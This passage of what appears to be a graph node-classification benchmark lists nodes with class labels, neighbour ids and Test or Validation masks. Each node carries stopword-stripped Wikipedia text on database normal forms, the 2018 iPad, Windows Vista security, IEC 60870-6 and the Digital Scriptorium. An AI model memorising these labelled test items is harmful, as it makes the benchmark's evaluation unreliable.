      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      1456,
      1972,
      9660,
      9667,
      457,
      5067,
      8147,
      2529,
      6625,
      8676,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 2022,
    "label": 1,
    "text": "Second_normal_form:second normal form second normal form 2nf normal form used database normalization 2nf originally defined e.f. codd 1971 relation second normal form fulfills following two requirements 2 non-prime attribute functionally dependent proper subset candidate key relation non-prime attribute relation attribute part candidate key relation put simply relation 2nf 1nf every non-prime attribute relation dependent whole every candidate key note put restriction non-prime non-prime attribute dependency addressed third normal form functional dependency part candidate key violation 2nf addition primary key relation may contain candidate keys necessary establish non-prime attributes part-key dependencies candidate keys following relation satisfy 2nf multiple manufacturer country dependent part candidate key even designer specified primary key model full name relation 2nf candidate keys manufacturer model also candidate key manufacturer country dependent proper subset manufacturer make design conform 2nf necessary two relations",
    "neighbors": [
      5792,
      5794,
      5795,
      9634,
      6983,
      2024,
      2025,
      2026,
      4281,
      3004,
      6782
    ],
    "mask": "Test"
  },
  {
    "node_id": 2023,
    "label": 2,
    "text": "IPad_(2018):ipad 2018 ipad officially sixth-generation ipad 9.7-inch 25cm tablet computer designed developed marketed apple inc announced march 27 2018 education-focused event lane tech high school chicago successor 2017 model upgraded apple a10 fusion soc support styluses apple pencil ipad also marketed towards educators schools ipad priced starting us 329 consumers 309 educators/students 299 schools ipad shipped ios 11.3 iwork suite apps preinstalled included apple pencil stylus support ipad hardware nearly identical previous generation except upgrades apple pencil stylus support upgraded processor apple a10 fusion available three colors silver space gray new gold color match updated color introduced iphone 8 ipad 2 gigabytes ram 7.5mm thick ipad available 32 128 gb storage options unlike ipad pro ipad feature laminated display gareth beavis techradar praised addition apple pencil powerful a10 chip noted costly previous generation ipad scott stein cnet also praised addition support apple pencil upgrade a10 chip criticized lacking smart connector well display technology ipad pro writing 2018 entry-level ipad n't add much makes already excellent tablet better buy ever",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      9970,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      4910,
      4399,
      7983,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 2024,
    "label": 1,
    "text": "Third_normal_form:third normal form third normal form 3nf normal form used normalizing database design reduce duplication data ensure referential integrity ensuring 1 entity second normal form 2 non-prime non-key attribute transitively dependent key i.e non-prime attribute depends non-prime attributes non-prime attributes must depend keys 3nf designed eliminate undesirable data anomalies reduce need restructuring time make data model informative make data model neutral different kinds query statistics codd later realized 3nf achieve first goals developed boyce-codd normal form address limitations 3nf third normal form 3nf normal form used database normalization 3nf originally defined e.f. codd 1971 codd definition states table 3nf following conditions hold non-prime attribute r attribute belong candidate key r. transitive dependency functional dependency x → z x determines z indirectly virtue x → → z case → x 3nf definition equivalent codd expressed differently given carlo zaniolo 1982 definition states table 3nf functional dependencies x → least one following conditions holds zaniolo definition gives clear sense difference 3nf stringent boyce–codd normal form bcnf bcnf simply eliminates third alternative every element a-x set difference x prime attribute approximation codd definition 3nf paralleling traditional pledge give true evidence court law given bill kent every non-key attribute must provide fact key whole key nothing key common variation supplements definition oath help codd requiring existence key ensures table 1nf requiring non-key attributes dependent whole key ensures 2nf requiring non-key attributes dependent nothing key ensures 3nf phrase useful mnemonic fact mentions single key means defines necessary sufficient conditions satisfy 2nd 3rd normal forms 2nf 3nf concerned equally candidate keys table one key chris date refers kent summary intuitively attractive characterization 3nf notes slight adaptation may serve definition slightly stronger boyce–codd normal form attribute must represent fact key whole key nothing key 3nf version definition weaker date bcnf variation former concerned ensuring non-key attributes dependent keys prime attributes keys parts keys must functionally dependent represent fact key sense providing part key rule applies functionally dependent attributes applying attributes would implicitly prohibit composite candidate keys since part key would violate whole key clause example 2nf table fails meet requirements 3nf row table needs tell us particular tournament particular year composite key tournament year minimal set attributes guaranteed uniquely identify row tournament year candidate key table breach 3nf occurs non-prime attribute winner date birth transitively dependent candidate key tournament year via non-prime attribute winner fact winner date birth functionally dependent winner makes table vulnerable logical inconsistencies nothing stop person shown different dates birth different records order express facts without violating 3nf necessary split table two update anomalies occur tables unlike winner primary key second table thus allowing one value date birth winner relation always decomposed third normal form relation r rewritten projections r ... r whose join equal original relation decomposition lose functional dependency sense every functional dependency r derived functional dependencies hold projections r ... r. decomposition computed polynomial time definition 3nf offered carlo zaniolo 1982 given proven following way let x → nontrivial fd i.e one x contain let non-key attribute also let key r. → x 3nf tables free update insertion deletion anomalies certain types 3nf tables rarely met practice affected anomalies tables either fall short boyce–codd normal form bcnf meet bcnf fall short higher normal forms 4nf 5nf 3nf ideal machine processing segmented nature data model difficult consume human user analytics via query reporting dashboards often facilitated different type data model provided pre-calculated analysis trend lines period-to-date calculations month-to-date quarter-to-date year-to-date cumulative calculations basic statistics average standard deviation moving averages previous period comparisons year ago month ago week ago e.g dimensional modeling beyond dimensional modeling flattening stars via hadoop data science",
    "neighbors": [
      5792,
      5794,
      5795,
      8291,
      2022,
      6983,
      7080,
      2025,
      2026,
      946,
      2901,
      10326,
      4281,
      3004,
      6782
    ],
    "mask": "Test"
  },
  {
    "node_id": 2025,
    "label": 1,
    "text": "Fourth_normal_form:fourth normal form fourth normal form 4nf normal form used database normalization introduced ronald fagin 1977 4nf next level normalization boyce–codd normal form bcnf whereas second third boyce–codd normal forms concerned functional dependencies 4nf concerned general type dependency known multivalued dependency table 4nf every one non-trivial multivalued dependencies x formula_1 x superkey—that x either candidate key superset thereof column headings relational database table divided three disjoint groupings x z context particular row refer data beneath group headings x z respectively multivalued dependency x formula_1 signifies choose x actually occurring table call choice x compile list xyz combinations occur table find x associated entries regardless z essentially presence z provides useful information constrain possible values trivial multivalued dependency x formula_1 one either subset x x together form whole set attributes relation functional dependency special case multivalued dependency functional dependency x → every x determines exactly one never one consider following example row indicates given restaurant deliver given variety pizza given area table non-key attributes key restaurant pizza variety delivery area therefore meets normal forms bcnf assume however pizza varieties offered restaurant affected delivery area i.e restaurant offers pizza varieties makes areas supplies meet 4nf problem table features two non-trivial multivalued dependencies restaurant attribute superkey dependencies non-trivial multivalued dependencies non-superkey reflect fact varieties pizza restaurant offers independent areas restaurant delivers state affairs leads redundancy table example told three times a1 pizza offers stuffed crust a1 pizza starts producing cheese crust pizzas need add multiple rows one a1 pizza delivery areas moreover nothing prevent us incorrectly might add cheese crust rows one a1 pizza delivery areas thereby failing respect multivalued dependency restaurant formula_1 pizza variety eliminate possibility anomalies must place facts varieties offered different table facts delivery areas yielding two tables 4nf contrast pizza varieties offered restaurant sometimes legitimately vary one delivery area another original three-column table would satisfy 4nf ronald fagin demonstrated always possible achieve 4nf rissanen theorem also applicable multivalued dependencies 1992 paper margaret s. wu notes teaching database normalization typically stops short 4nf perhaps belief tables violating 4nf meeting lower normal forms rarely encountered business applications belief may accurate however wu reports study forty organizational databases 20 contained one tables violated 4nf meeting lower normal forms rare situations 4nf table conform higher normal form 5nf situations complex real-world constraint governing valid combinations attribute values 4nf table implicit structure table",
    "neighbors": [
      5792,
      5794,
      5795,
      2022,
      6983,
      2024,
      2026,
      10737,
      244,
      4281,
      3004,
      6782
    ],
    "mask": "Test"
  },
  {
    "node_id": 2026,
    "label": 1,
    "text": "First_normal_form:first normal form first normal form 1nf property relation relational database relation first normal form domain attribute contains atomic indivisible values value attribute contains single value domain first definition term 1971 conference paper edgar codd defined relation first normal form none domains sets elements first normal form essential property relation relational database database normalization process representing database terms relations standard normal forms first normal minimal requirement first normal form enforces criteria following scenarios first illustrate database design might violate first normal form followed examples comply table stores names telephone numbers customers one requirement though retain telephone numbers customers simplest way satisfying requirement allow telephone number column given row contain one value note telephone number column simply contains text numbers different formats importantly one number two customers duplicating related information column would satisfied arbitrary text would fine arbitrary text obviously intended column contain telephone number seen telephone numbers text atomic subdivided well seen telephone numbers text contains one number two rows representation telephone numbers first normal form columns contain non-atomic values contain one apparent solution introduce columns technically table violate requirement values atomic however informally two telephone number columns still form repeating group repeat conceptually attribute namely telephone number arbitrary hence meaningless ordering introduced 555-861-2025 put telephone number1 column rather telephone number2 column reason customers could two telephone numbers many telephone number n columns possible search telephone number without searching arbitrary number columns adding extra telephone number may require table reorganized addition new column rather new row tuple added null value telephone number2 customer 789 also issue bring model first normal form split strings used hold telephone number information atomic i.e indivisible entities single phone numbers ensure row contains one phone number note id longer unique solution duplicated customers uniquely identify row need use combination id telephone number value combination unique although column separately contains repeated values able uniquely identify row tuple requirement 1nf alternative design uses two tables columns contain one telephone number design instead customer-to-telephone number link appears row using customer id key one-to-many relationship exists name number tables row parent table customer name associated many telephone number rows child table customer telephone number telephone number belongs one one customer worth noting design meets additional requirements second third normal form edgar f. codd definition 1nf makes reference concept 'atomicity codd states values domains relation defined required atomic respect dbms codd defines atomic value one decomposed smaller pieces dbms excluding certain special functions meaning column divided parts one kind data one part means dbms depends another part column hugh darwen chris date suggested codd concept atomic value ambiguous ambiguity led widespread confusion 1nf understood particular notion value decomposed problematic would seem imply data types atomic date suggests notion atomicity absolute meaning value may considered atomic purposes may considered assemblage basic elements purposes position accepted 1nf defined reference atomicity columns conceivable data type string types numeric types array types table types acceptable 1nf table—although perhaps always desirable example would desirable separate customer name column two separate columns first name surname according date definition table first normal form isomorphic relation means specifically satisfies following five conditions violation conditions would mean table strictly relational therefore first normal form examples tables views would meet definition first normal form first normal form defined chris date permits relation-valued attributes tables within tables date argues relation-valued attributes means column within table contain table useful rare cases",
    "neighbors": [
      5792,
      5794,
      5795,
      10628,
      2022,
      6983,
      2024,
      2025,
      9286,
      10413,
      9397,
      10326,
      4281,
      3004,
      6782
    ],
    "mask": "Test"
  },
  {
    "node_id": 2027,
    "label": 2,
    "text": "Security_and_safety_features_new_to_Windows_Vista:security safety features new windows vista number security safety features new windows vista available prior microsoft windows operating system release beginning early 2002 microsoft announcement trustworthy computing initiative great deal work gone making windows vista secure operating system predecessors internally microsoft adopted security development lifecycle underlying ethos secure design secure default secure deployment new code windows vista developed sdl methodology existing code reviewed refactored improve security specific areas windows vista introduces new security safety mechanisms include user account control parental controls network access protection built-in anti-malware tool new digital content protection mechanisms user account control new infrastructure requires user consent allowing action requires administrative privileges feature users including users administrative privileges run standard user mode default since applications require higher privileges action attempted needs administrative privileges installing new software changing system settings windows prompt user whether allow action user chooses allow process initiating action elevated higher privilege context continue standard users need enter username password administrative account get process elevated over-the-shoulder credentials administrator choose prompted consent ask credentials uac asks credentials secure desktop mode entire screen faded temporarily disabled present elevation ui prevent spoofing ui mouse application requesting elevation application requesting elevation focus switch secure desktop occurs taskbar icon blinks focussed elevation ui presented however possible prevent malicious application silently obtaining focus since secure desktop allows highest privilege system applications run user mode application present dialog boxes desktop prompt elevation consent safely assumed genuine additionally also help protect shatter attacks intercept windows inter-process messages run malicious code spoof user interface preventing unauthorized processes sending messages high privilege processes process wants send message high privilege process must get elevated higher privilege context via uac applications written assumption user running administrator privileges experienced problems earlier versions windows run limited user accounts often attempted write machine-wide system directories program files registry keys notably hklm uac attempts alleviate using file registry virtualization redirects writes subsequent reads per-user location within user ’ profile example application attempts write “ c \\program files\\appname\\settings.ini ” user ’ permissions write directory write get redirected “ c \\users\\username\\appdata\\local\\virtualstore\\program files\\appname\\. ” bitlocker formerly known secure startup feature offers full disk encryption system volume using command-line utility possible encrypt additional volumes bitlocker utilizes usb key trusted platform module tpm version 1.2 tcg specifications store encryption key ensures computer running windows vista starts known-good state also protects data unauthorized access data volume encrypted full volume encryption key fvek encrypted volume master key vmk stored disk windows vista first microsoft windows operating system offer native support tpm 1.2 providing set apis commands classes services use management tpm new system service referred tpm base services enables access sharing tpm resources developers wish build applications support device encrypting file system efs windows vista used encrypt system page file per-user offline files cache efs also tightly integrated enterprise public key infrastructure pki supports using pki-based key recovery data recovery efs recovery certificates combination two also new group policies require smart cards efs enforce page file encryption stipulate minimum key lengths efs enforce encryption user ’ documents folder prohibit self-signed certificates efs encryption key cache cleared user locks workstation certain time limit efs rekeying wizard allows user choose certificate efs select migrate existing files use newly chosen certificate certificate manager also allows users export efs recovery certificates private keys users reminded back efs keys upon first use balloon notification rekeying wizard also used migrate users existing installations software certificates smart cards wizard also used administrator users recovery situations method efficient decrypting reencrypting files windows vista significantly improves firewall address number concerns around flexibility windows firewall corporate environment windows vista includes windows defender microsoft anti-spyware utility according microsoft renamed 'microsoft antispyware features scanning system spyware similar free products market also includes real time security agents monitor several common areas windows changes may caused spyware areas include internet explorer configuration downloads auto-start applications system configuration settings add-ons windows windows shell extensions windows defender also includes ability remove activex applications installed block startup programs also incorporates spynet network allows users communicate microsoft send consider spyware check applications acceptable windows vista allow administrators enforce hardware restrictions via group policy prevent users installing devices restrict device installation predefined white list restrict access removable media classes devices windows vista includes range parental controls non-domain user accounts parental controls allows administrators set restrictions monitor computer activity parental controls relies user account control much functionality features include features extensible replaced parental control applications using parental controls application programming interfaces apis windows vista uses address space layout randomization aslr load system files random addresses memory default system files loaded randomly possible 256 locations executables specifically set bit header portable executable pe file file format windows executables use aslr executables stack heap allocated randomly decided loading system files random addresses becomes harder malicious code know privileged system functions located thereby making unlikely predictably use helps prevent remote execution attacks preventing return-to-libc buffer overflow attacks portable executable format updated support embedding exception handler address header whenever exception thrown address handler verified one stored executable header match exception handled otherwise indicates run-time stack compromised hence process terminated function pointers obfuscated xor-ing random number actual address pointed hard retrieve would manually change pointer obfuscation key used pointer would hard retrieve thus made hard unauthorized user function pointer able actually use also metadata heap blocks xor-ed random numbers addition check-sums heap blocks maintained used detect unauthorized changes heap corruption whenever heap corruption detected application killed prevent successful completion exploit windows vista binaries include intrinsic support detection stack-overflow stack overflow windows vista binaries detected process killed used carry exploit also windows vista binaries place buffers higher memory non buffers like pointers supplied parameters lower memory area actually exploit buffer underrun needed gain access locations however buffer underruns much less common buffer overruns windows vista offers full support nx no-execute feature modern processors dep introduced windows xp service pack 2 windows server 2003 service pack 1 feature present nx evp amd amd64 processors xd edb intel processors flag certain parts memory containing data instead executable code prevents overflow errors resulting arbitrary code execution processor supports nx-bit windows vista automatically enforces hardware-based data execution prevention processes mark memory pages non-executable data segments like heap stack subsequently data prevented interpreted executed code prevents exploit code injected data executed dep enabled applications users gain additional resistance zero-day exploits applications dep-compliant generate dep exceptions therefore dep enforced applications default 32-bit versions windows turned critical system components however windows vista introduces additional nx policy controls allow software developers enable nx hardware protection code independent system-wide compatibility enforcement settings developers mark applications nx-compliant built allows protection enforced application installed runs enables higher percentage nx-protected code software ecosystem 32-bit platforms default system compatibility policy nx configured protect operating system components x86-64 applications backward compatibility issue therefore dep enforced default 64-bit programs also processor-enforced dep used x86-64 versions windows vista greater security new digital rights management content-protection features introduced windows vista help digital content providers corporations protect data copied inclusion new digital rights management features source criticism windows vista windows vista introduces mandatory integrity control set integrity levels processes low integrity process access resources higher integrity process feature used enforce application isolation applications medium integrity level applications running standard user context hook system level processes run high integrity level administrator mode applications hook onto lower integrity processes like windows internet explorer 7 8 lower privilege process perform window handle validation higher process privilege sendmessage postmessage higher privilege application windows use thread hooks attach higher privilege process use journal hooks monitor higher privilege process perform dll–injection higher privilege process windows service hardening compartmentalizes services one service compromised easily attack services system prevents windows services operations file systems registry networks supposed thereby reducing overall attack surface system preventing entry malware exploiting system services services assigned per-service security identifier sid allows controlling access service per access specified security identifier per-service sid may assigned service installation via changeserviceconfig2 api using sc.exe command sidtype verb services also use access control lists acl prevent external access resources private services windows vista also run less privileged account local service network service instead system account previous versions windows ran system services login session locally logged-in user session 0 windows vista session 0 reserved services interactive logins done sessions intended help mitigate class exploits windows message-passing system known shatter attacks process hosting service privileges specified requiredprivileges registry value hklm\\system\\currentcontrolset\\services services also need explicit write permissions write resources per-service basis using write-restricted access token resources modified service given write access trying modify resource fails services also pre-configured firewall policy gives much privilege needed function properly independent software vendors also use windows service hardening harden services windows vista also hardens named pipes used rpc servers prevent processes able hijack graphical identification authentication gina used secure authentication interactive logon replaced credential providers combined supporting hardware credential providers extend operating system enable users log biometric devices fingerprint retinal voice recognition passwords pins smart card certificates custom authentication package schema third party developers wish create smart card authentication flexible certificate requirements relaxed enterprises may develop deploy optionally enforce custom authentication mechanisms domain users credential providers may designed support single sign-on sso authenticating users secure network access point leveraging radius technologies well machine logon credential providers also designed support application-specific credential gathering may used authentication network resources joining machines domain provide administrator consent user account control authentication also supported using ipv6 web services new security service provider credssp available security support provider interface enables application delegate user ’ credentials client using client-side ssp target server server-side ssp credssp also used terminal services provide single sign-on windows vista authenticate user accounts using smart cards combination passwords smart cards two-factor authentication windows vista also use smart cards store efs keys makes sure encrypted files accessible long smart card physically available smart cards used logon efs operates single sign-on mode uses logon smart card file encryption without prompting pin fast user switching limited workgroup computers windows xp also enabled computers joined domain starting windows vista windows vista also includes authentication support read-only domain controllers introduced windows server 2008 windows vista features update crypto api known cryptography api next generation cng cng api user mode kernel mode api includes support elliptic curve cryptography ecc number newer algorithms part national security agency nsa suite b extensible featuring support plugging custom cryptographic apis cng runtime also integrates smart card subsystem including base csp module implements standard backend cryptographic functions developers smart card manufacturers need write complex csps microsoft certificate authority issue ecc certificates certificate client enroll validate ecc sha-2 based certificates revocation improvements include native support online certificate status protocol ocsp providing real-time certificate validity checking crl prefetching capi2 diagnostics certificate enrollment wizard-based allows users input data enrollment provides clear information failed enrollments expired certificates certenroll new com-based enrollment api replaces xenroll library flexible programmability credential roaming capabilities replicate active directory key pairs certificates credentials stored stored user names passwords within network windows vista introduces network access protection nap ensures computers connecting communicating network conform required level system health set administrator network depending policy set administrator computers meet requirements either warned granted access allowed access limited network resources denied access completely nap also optionally provide software updates non-compliant computer upgrade level required access network using remediation server conforming client given health certificate uses access protected resources network network policy server running windows server 2008 acts health policy server clients need use windows xp sp3 later vpn server radius server dhcp server also act health policy server number specific security reliability changes made",
    "neighbors": [
      513,
      5761,
      517,
      6028,
      6797,
      9745,
      8211,
      3351,
      4248,
      537,
      9114,
      10392,
      3742,
      8094,
      929,
      7713,
      2083,
      9505,
      10020,
      7207,
      1577,
      10026,
      1581,
      2221,
      7983,
      8368,
      10673,
      1077,
      8246,
      4663,
      5433,
      1978,
      7354,
      7739,
      6462,
      9791,
      1474,
      8391,
      1098,
      10058,
      10828,
      4174,
      7887,
      5840,
      10831,
      6098,
      3283,
      11605,
      1113,
      5465,
      7515,
      10332,
      5470,
      2783,
      9694,
      10207,
      9442,
      740,
      3944,
      617,
      5225,
      8040,
      9196,
      622,
      8432,
      10993,
      7794,
      6904,
      9593,
      5754,
      5500,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2028,
    "label": 2,
    "text": "Citrus_Project:citrus project citrus comprehensive i18n framework towards respectable unix systems project aims implement complete multilingual programming environment bsd-based operating systems goals include creation following things freebsd netbsd openbsd bsd/os dragonfly bsd aim reach level functionality solaris 7",
    "neighbors": [
      5506,
      8262,
      7983,
      5492,
      5371,
      2045,
      9151
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2029,
    "label": 9,
    "text": "Class_variable:class variable object-oriented programming classes class variable variable declared codice_1 modifier single copy exists regardless many instances class exist note java terms field variable used interchangeably class variable instance variable special type class attribute class property field data member dichotomy instance class members applies methods member functions well class may instance methods class methods languages class variables class methods either statically resolved via dynamic dispatch memory statically allocated compile time entire class static variables dynamically allocated run time every instantiation object cases however either dynamic example classes dynamically defined run time class variables classes allocated dynamically class defined languages class methods also dispatched dynamically thus languages static member variable static member function used synonymously place class variable class function synonymous across languages terms commonly used java c c++ class variables class methods declared codice_1 keyword referred static member variables static member functions c++ example class variable codice_3 incremented call constructor codice_3 always holds number requests constructed new request object given codice_5 sequential order since codice_6 class variable one object codice_3 contrast request object contains distinct codice_5 field also note variable codice_3 initialized",
    "neighbors": [
      2048,
      5677,
      1973,
      7894,
      10075,
      2556,
      9245,
      6335
    ],
    "mask": "Test"
  },
  {
    "node_id": 2030,
    "label": 4,
    "text": "IEC_60870-6:iec 60870-6 iec 60870 part 6 one iec 60870 set standards define systems used telecontrol supervisory control data acquisition electrical engineering power system automation applications iec technical committee 57 working group 03 developed part 6 provide communication profile sending basic telecontrol messages two systems compatible iso standards itu-t recommendations standards include typical national power grid includes hierarchy control centres manage generation transmission distribution power throughout grid prior development electronics telecommunications networks co-ordination control centres carried telephone however development scada supervisory control data acquisition systems allowed remote control monitoring electrical plant centralised control centres initially individual scada manufacturers developed proprietary closed protocols communicating control centre electrical equipment field followed development open industry-standard protocols dnp3 iec 61850 however none communication protocols suited requirements communicating control centres meet special requirements communication co-ordination control centres iec developed iec 60870 set standards inter-control center communications protocol iccp iec 60870-6/tase.2 specified utility organizations throughout world provide data exchange wide area networks wans utility control centers utilities power pools regional control centers non-utility generators iccp also international standard international electrotechnical commission iec telecontrol application service element 2 tase.2 inter-utility real time data exchange become critical operation interconnected systems parts world example development electricity markets seen management electricity networks functional hierarchy split across boundaries commercial entities top level typically system operator coordination responsibilities dispatch overall system security regional transmission companies tie together distribution companies generating companies continental power systems considerable interconnection across international borders iccp allows exchange real time historical power system information including status control data measured values scheduling data energy accounting data operator messages historically reliance custom proprietary links protocols exchange real time data systems iccp began effort develop international standard real-time data exchange within electric power utility industry working group formed 1991 develop protocol standard develop prototype test specification submit specification iec standardisation carry interoperability testing developing vendors initial driver meet european common market requirements 1992 official designation first protocol tase.1 telecontrol application service element-1 second protocol tase.2 making use manufacturing message specification mms appears version become popular us iccp networks widely used tie together groups utility companies typically regional system operator transmission utilities distribution utilities generators regional operators may also connected together co-ordinate import export power regions across major inter-ties basic iccp functionality specified “ conformance blocks ” listed objects used convey data defined various parts iec 60870-6 block description data examples iccp based client server principles data transfers result request control centre client another control centre server control centres may clients servers iccp operates physical interfaces transport network services fit model supported tcp/ip ethernet 802.3 seems common iccp may operate single point-to-point link two control centres however general case many control centres routed wide area network logical connections “ associations ” control centres completely general client may establish associations one server client may establish one association server multiple associations server established different levels quality service high priority real time data delayed lower priority non real time data transfers iccp provide authentication encryption services normally provided lower protocol layers iccp uses “ bilateral tables ” control access bilateral table represents agreement two control centres connected iccp link agreement identifies data elements objects accessed via link level access permitted iccp link established contents bilateral tables server client provide complete control accessible party must matching entries server client tables provide access data objects wide acceptance iccp utility industry resulted several iccp products market although interoperability regarded high risk area standard implementation support conformance blocks order claim compliance standard minimal implementation requires block 1 blocks necessary achieve required functionality need implemented also necessary support objects defined standard particular block extensive interoperability testing products major vendors feature iccp protocol development independent reports available doubt reports vendors iccp purchaser must define functionality required terms conformance blocks required objects within blocks application profiles iccp client server conformances must match link operate successfully iccp real time data exchange protocol providing features data transfer monitoring control complete iccp link need facilities manage configure link monitor performance iccp standard specify interface requirements features necessary nevertheless affect interoperability similarly failover redundancy schemes way scada responds iccp requests protocol issue specified non protocol specific features referred standard “ local implementation issues ” iccp implementers free handle issues way wish local implementation means developers differentiate product market added value additional money spent product well-developed maintenance diagnostic tools may well saved many times life product use iccp connection expected grow change commercial iccp products generally available one three configurations embedded protocol iccp management tools interfaces part complete suite tools scada configuration offers maximum performance direct access scada database without requiring intervening buffering approach may available addition legacy system iccp application may restricted accessing scada environment embedded networked server making use industry standard communications networking scada host may provide performance approaching embedded iccp application application interface side iccp restricted scada environment open systems separate data historian databases security may easier manage iccp server segregated operational real time systems gateway processor approach similar networked server except intended legacy systems minimal communications networking capability lowest performance minimal situation iccp gateway may communicate scada host via serial port similar manner scada rtus",
    "neighbors": [
      4064,
      2519,
      11267,
      2117,
      4359,
      8904,
      3629,
      6062,
      8854,
      3447,
      5433,
      62
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2031,
    "label": 1,
    "text": "Digital_Scriptorium:digital scriptorium digital scriptorium ds non-profit tax-exempt consortium american libraries collections pre-modern manuscripts manuscripts made tradition books printing ds database represents manuscript collections web-based union catalog teaching scholarly research medieval renaissance studies provides access illuminated textual manuscripts online cataloging records supported high resolution digital images retrievable various topic searches ds database open access resource enables users study rare valuable materials academic research public libraries makes available collections often restricted public access includes famous masterpieces book illumination also understudied manuscripts previously overlooked publication study funded grants andrew w. mellon foundation national endowment humanities gladys krieble delmas foundation ds inception 1997 joint project bancroft library university california berkeley prof. charles faulhaber rare book manuscript library columbia university dr. consuelo w. dutschke plan digitize make available world wide web catalog records selected images two universities medieval early renaissance manuscript collections decision favor sample images rather complete imaging manuscripts originally practical today ds includes records sample complete imaging records sample images offer various pathways entrance growing corpus medieval renaissance manuscripts available online patterns collecting 19th early 20th century moreover many manuscripts american collections comprise partial texts detached single leaves cataloging many fragmentary works possible increases chance manuscripts could reconstituted virtually thus philosophical principle ds includes large small collections complete bound books single leaves 1999 2002 additional holdings huntington library university texas austin new york public library incorporated along number smaller collections database continued grow represents collections thirty member institutions including substantial repositories harvard university houghton library yale university beinecke library university pennsylvania also libraries rare works providence public library owns unusual 15th century bible wetmore ms 1 rebus format september 2015 ds counts catalog records 8,390 manuscripts 47,624 digitized images digital scriptorium database enables public viewing non-circulating materials normally available specialists restricted access visual catalog ds allows scholars verify cataloguing information places dates origin scripts artists quality special emphasis placed touchstone materials manuscripts signed dated scribes thus beginning american contribution goal established 1953 comité international de paléographie latine international committee latin paleography document photographically proportionately small number codices certain origin serve stylistically localize date vast quantities unsigned manuscripts ds publishes manuscripts firm attribution also ones need attention scholarship traditionally would unlikely candidates reproduction web-based also allows updates corrections matter form individual records ds acknowledge contributions outside scholars ds consortium consists academic public rare book libraries encourages broad audience benefits reciprocally beneficial body knowledge attending needs community specialists medievalists classicists musicologists paleographers diplomatists literary scholars art historians ds also recognizes public user community values rare unique works historical literary artistic significance working together ds consortium expanded resources libraries manage collections rare materials providing digital cataloging standard pre-modern manuscripts ds record includes extensive granular descriptive metadata supported high resolution digital images medieval renaissance manuscripts best served format-specific cataloging sensitive complexity hand-made books historical artifacts differ modern manuscripts letters personal records although unique objects usually unique texts may written bound decorated hand pre-modern manuscripts books text fourteenth-century missal example identified using early twentieth-century printed version text several collections may one manuscript st. augustine ’ de civitate dei city god ds search title fact retrieves fourteen copies work unique manuscripts dating 12th 15th centuries owned eight different libraries potential relationships among manuscripts means item-level bibliographic cataloging rather collection-based archival cataloging best identifies describes content medieval renaissance manuscripts works also historical artifactual significance catalog records medieval renaissance manuscripts need describe contents also complete provenance chain ownership binding may later period rest book marks ownership coats-of-arms physical condition material support usually parchment foliation construction book layout text attribution script date often estimated style localization decoration painted illustration names authors craftsmen scribes artists owners scholars medieval renaissance manuscripts less interested text manuscript aspect production field art history offers striking example scholar studying art illuminator mariano del buono care equally harvard manuscript copy plato manuscript held new york public library copy livy ds records factor interests allow searching physical features whether artist name example place date origin italy 1450-1499 would produce result digitization records medieval renaissance manuscripts excluded library public access catalogs instead published printed books written scholar-specialists similarly trained audience compared ds records similar library cataloging records simplified standardized concise specialists may notice ds record omits information collation available scholarly catalogs order avoid descriptions would take much time discourage library catalogers attempting task agreement green meisner goal product less process spanish proverb goes lo mejor es enemigo de lo bueno ds record thus intended serve ideal thorough description manuscript rather practical surrogate still provides better representation typical content-based opac online public access catalog record compared marc marc standards bibliographic standards used american libraries ds better designed describe content also historical context physical characteristics using sample images support descriptions sample images contain inherently descriptive information ds records include digital images although exceptions although ds records adapted marc formats ds better captures complexity medieval renaissance manuscripts marc example ds nests sections descriptive metadata order catalog manuscript multiple texts multiple origins one binding marc provides flat file deal coterminous text physical unit ds also indexes specific information pertinent format separate field artist example rather one personal names ds also creates focused records compared archival cataloging based ead encoded archival description latter collections-based designed descriptive searched item level thus ds cataloging method become unofficial library standard online cataloging medieval renaissance manuscripts united states university california berkeley provided first home ds database terms managing project devising initial technology interim period time 2003–2011 ds hosted columbia university returned original home berkeley technical innovations produced teams originating universities created digital product based progressive standards-based digitization policy originally using microsoft access serve cross-institutional data collection tool ds database used sgml later xml aggregate query combined information present platform managed u.c berkeley depends upon software known webgendb webgendb non-proprietary web-based interface underlying control database gendb gendb houses descriptive structural administrative metadata materials digitized web presentation outputs metadata using metadata encoding transmission standard mets format mets provides xml schema-based specification encoding hub documents materials whose content digital hub document draws together potentially dispersed related files data mets uses xml provide flexible vocabulary syntax identifying digital components together comprise digital object specifying location components expressing structural relationships digital components comprising digital object could include content files descriptive metadata administrative metadata mets used transfer dissemination and/or archiving digital objects compliance oais open archival information system reference model developed oclc ds reliance oais iso 14721 2003 promises secure digital preservation 